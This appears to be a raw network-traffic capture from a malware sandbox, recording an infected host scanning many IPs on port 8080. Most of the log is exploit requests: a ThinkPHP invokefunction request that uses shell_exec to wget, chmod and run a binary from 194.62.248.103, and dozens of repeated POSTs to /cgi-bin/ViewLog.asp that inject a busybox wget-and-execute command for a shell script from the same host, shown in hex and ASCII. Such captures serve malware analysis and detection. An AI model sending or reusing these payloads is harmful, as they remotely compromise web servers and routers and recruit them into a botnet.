                                                        Apr 14, 2024 16:35:30.587357998 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:30.968214035 CEST29INHTTP/1.1 200 OK
                                                        Apr 14, 2024 16:35:30.968286991 CEST515INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                        Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        200192.168.2.234095831.33.14.758080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:31.016338110 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:31.937328100 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:33.761024952 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        201192.168.2.234540094.123.49.1988080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:31.054630041 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        202192.168.2.234353294.121.43.1208080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:31.058247089 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        203192.168.2.233603294.122.218.2518080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:31.062098980 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        204192.168.2.235297094.120.96.1528080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:31.062340975 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        205192.168.2.234687495.164.206.2228080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:31.235234976 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:31.455378056 CEST1260INHTTP/1.1 400 Bad Request
                                                        Server: squid/3.5.20
                                                        Mime-Version: 1.0
                                                        Date: Sun, 14 Apr 2024 14:35:31 GMT
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Length: 3560
                                                        X-Squid-Error: ERR_INVALID_URL 0
                                                        Vary: Accept-Language
                                                        Content-Language: en
                                                        X-Cache: MISS from ezproxies.com
                                                        X-Cache-Lookup: NONE from ezproxies.com:8080
                                                        Via: 1.1 ezproxies.com (squid/3.5.20)
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2016 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2016 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-famil


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        206192.168.2.233993831.136.68.1618080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:31.372056961 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:32.353137016 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:34.272881031 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:38.176316023 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:45.855346918 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:01.213270903 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:33.208911896 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        207192.168.2.234691831.136.0.28080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:31.373830080 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:32.353130102 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:34.304907084 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:38.176306963 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:46.111350060 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:01.725059032 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:33.208980083 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        208192.168.2.233287031.30.122.2228080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:31.374511003 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:31.695178986 CEST1289INHTTP/1.1 404 Not Found
                                                        Date: Sun, 14 Apr 2024 14:35:31 GMT
                                                        Cache-Control: must-revalidate,no-cache,no-store
                                                        Content-Type: text/html;charset=ISO-8859-1
                                                        Content-Length: 1286
                                                        Server: Jetty(8.1.5.v20120716)
                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 2f 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 32 3e 48 54 54 50 20 45 52 52 4f 52 3a 20 34 30 34 3c 2f 68 32 3e 0a 3c 70 3e 50 72 6f 62 6c 65 6d 20 61 63 63 65 73 73 69 6e 67 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 2e 20 52 65 61 73 6f 6e 3a 0a 3c 70 72 65 3e 20 20 20 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 72 65 3e 3c 2f 70 3e 0a 3c 68 72 20 2f 3e 3c 69 3e 3c 73 6d 61 6c 6c 3e 50 6f 77 65 72 65 64 20 62 79 20 4a 65 74 74 79 3a 2f 2f 3c 2f 73 6d 61 6c 6c 3e 3c 2f 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 